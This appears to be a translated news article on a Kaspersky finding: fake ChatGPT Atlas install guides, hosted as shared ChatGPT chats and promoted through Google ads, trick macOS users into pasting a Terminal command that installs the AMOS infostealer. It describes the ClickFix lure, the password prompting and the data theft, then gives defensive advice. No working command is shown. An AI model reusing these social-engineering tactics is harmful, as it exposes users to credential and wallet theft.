A recent analysis done by cybersecurity experts at Kaspersky has brought to light an insidious cyber attack aimed at macOS users where search engines, artificial intelligence and cybersecurity intertwine, creating rather fertile ground for a new dangerous online fraud. Attackers exploit ChatGPT’s chat sharing feature to create an installation guide for ChatGPT Atlas (OpenAI’s browser). The result is a trap capable of deceiving even the most astute: every detail (from the website to the guide) apparently seems harmless, perfectly legitimate. In this in-depth analysis we reconstruct the key steps of this new attack: how criminals manipulate Google Ads with misleading links, how they use ChatGPT as a “window display” to promote false guidance, the social engineering techniques used, etc. We will then illustrate the danger of the malware in question, the AMOS infostealer, capable of stealing numerous data from the victims of this attack (from history to crypto wallets) and we will also explain how to concretely defend yourself.
How the Mac attack that exploits ChatGPT shared chats works
It all starts with the use of sponsored ads on Google. The experts at Kaspersky they explain that, by searching for terms like “chatgpt atlas” on Google, the first result appears completely legitimate: coherent title, domain indicated as the official one of ChatGPT and no apparent signs of counterfeiting. Since the full address is not visible in the preview, criminals are able to hide the real destination you will reach by opening that URL. In fact, clicking on the link opens a page actually hosted on the official ChatGPT domain, but it is only a conversation shared via the appropriate function.
And here we find a first aspect that underlies the mechanism of this attack: the link comes from the domain of the OpenAI chatbot, which gives the guide an aura of authenticity that induces many users to lower their defenses and their attention threshold. The content shown on the page opened in ChatGPT is a fake Atlas installation guide. Here the attackers used the prompt engineeringmodeling requests to the AI to obtain a technical text, formatted in an orderly and credible way. They then cleaned up the previous chat to hide any trace of the manipulation. A truly attentive eye, however, could still notice that something doesn’t add up. Kasperskyin fact, he explains:
Links to shared chats begin with chatgpt.com/share/. In fact, right above the chat it is clearly indicated: “This is a copy of a conversation between ChatGPT and an anonymous user”.
However, a less attentive or simply less AI-savvy visitor might take the guide at face value, especially since it is well formatted and published on a reliable-looking site.
The critical point arrives when the user follows the elusive instructions with which to proceed with the installation of the OpenAI browser. Users are prompted to copy and paste a command into the macOS Terminal. This is a key step: the command given in the macOS Terminal immediately downloads and starts a script from an external server. This is a variant of the ClickFix method, where the victim is convinced to manually perform a malicious operation. Many users, while avoiding unknown files, do not associate the same risk with a command that they paste into the Terminal. Once launched, the script repeatedly asks for the system password until the correct one is entered; at that point, the malware installs itself using the privileges obtained.
At this point the user who has carefully followed the various steps of the “malicious tutorial” will find himself having installed a variant of AMOS (Atomic macOS Stealer), a dangerous infostealer created to steal a large amount of sensitive data. It extracts passwords and cookies from major browsers, data from apps like OpenVPN and Telegram, and empties crypto wallets (like Electrum, Coinomi and Exodus). But it doesn’t stop there: it also recovers the user’s personal files from the Mac’s main folders (including Desktop, Documents and Downloads), packages everything up and sends the information to servers run by criminals. In addition to data theft, it installs a backdoor that grants continuous remote access to the device, reactivating itself every time the Mac is restarted.
How to defend yourself from the AMOS infostealer
Given the danger of this attack, you will now certainly want to know which defense strategies to adopt to reduce the risk of infection. Here are some points to keep in mind:
- The first step is to use an updated anti-malware solution for macOS, a system that is far from immune to cyber attacks.
- If you want to install ChatGPT Atlas, follow the instructions in our guide and be wary of any instructions that require you to manually open the Terminal to execute commands taken from the Web or from a chat, even if the tone appears technical and reassuring: it is a typical sign of social engineering.
- When faced with unsolicited or unclear instructions, the wisest choice is to close the page. Alternatively, you can paste the suspicious command into an AI chat to ask for analysis: a simple check can avoid major damage.
